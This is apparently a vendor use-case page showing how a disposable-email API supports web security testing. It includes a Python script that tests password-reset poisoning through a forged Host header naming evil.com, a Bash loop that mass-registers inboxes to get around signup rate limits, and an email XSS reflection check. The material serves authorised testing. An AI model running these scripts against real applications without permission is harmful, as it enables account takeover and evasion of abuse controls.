← Use Cases/Security Testing

Security & Penetration Testing

Validate authentication controls, password reset poisoning vulnerabilities, token leakage, and email HTML sanitization within isolated, disposable environments.

What you'll need

  • A Developer plan or above (for higher rate limits and guaranteed inbox persistence)
  • Our CLI tool or REST API access
  • Testing automation scripts (Python/Bash) for security suites

Password Reset Poisoning

You can dynamically provision an inbox using the Python SDK to receive a password reset email and verify if the application leaks the reset token via Host header injection.

python
import requests, os, time
from freecustom_email import FreeCustomEmail

fce = FreeCustomEmail(api_key=os.environ.get("FCE_API_KEY"), sync=True)
TARGET_URL = "https://target-app.local/forgot-password"

def run_poisoning_test():
    # 1. Provision target inbox
    inbox = f"sec-target-{int(time.time())}@ditapi.info"
    fce.inboxes.register(inbox)

    # 2. Trigger reset with malicious Host header
    malicious_host = "evil.com"
    requests.post(TARGET_URL,
        headers={"Host": malicious_host},
        data={"email": inbox}
    )

    # 3. Wait for the email and check the verification link
    try:
        # wait_for automatically handles polling and returns an OTP/link object
        result = fce.otp.wait_for(inbox, timeout_ms=30000)
        link = result.verification_link if hasattr(result, "verification_link") else str(result)
        
        if malicious_host in link:
            print(f"[!] VULNERABLE: Token leaked to {malicious_host}. Link: {link}")
        else:
            print("[+] SAFE: Host header ignored.")
    except Exception as e:
        print(f"[-] No email received or error: {e}")

run_poisoning_test()

Auth Rate Limit Validation

Bypass IP-based or email-based rate limits during assessments by using hundreds of unique email identities on the fly. FreeCustom.Email's wildcard domains (e.g., anything@ditapi.info) and fresh domains feature ensure your traffic doesn't get blocked.

bash
#!/bin/bash
# Using the FCE CLI to generate unique emails in a loop for fuzzing

for i in {1..50}; do
  INBOX="fuzz-$i@ditapi.info"
  
  # Register
  fce register $INBOX --silent
  
  # Trigger signup
  curl -X POST https://target-app.local/signup \
       -d "email=$INBOX" -d "password=TestPass123!"
done

Email HTML Injection (XSS)

Verify how your system sanitizes input reflected in emails (like usernames or profile data). Using the Python SDK, you can quickly fetch the raw HTML body to check for executable scripts.

python
import os
from freecustom_email import FreeCustomEmail

fce = FreeCustomEmail(api_key=os.environ["FCE_API_KEY"], sync=True)

def check_email_for_xss(inbox: str, payload: str):
    # Fetch the latest message
    messages = fce.messages.list(inbox, limit=1)
    if not messages:
        print("[-] No messages found")
        return
        
    msg_id = messages[0].id
    
    # Fetch full HTML content
    full_msg = fce.messages.get(inbox, msg_id)
    html_body = full_msg.html
    
    if payload in html_body:
        print("[!] HTML Payload reflected without sanitization!")
    else:
        print("[+] Input was sanitized safely.")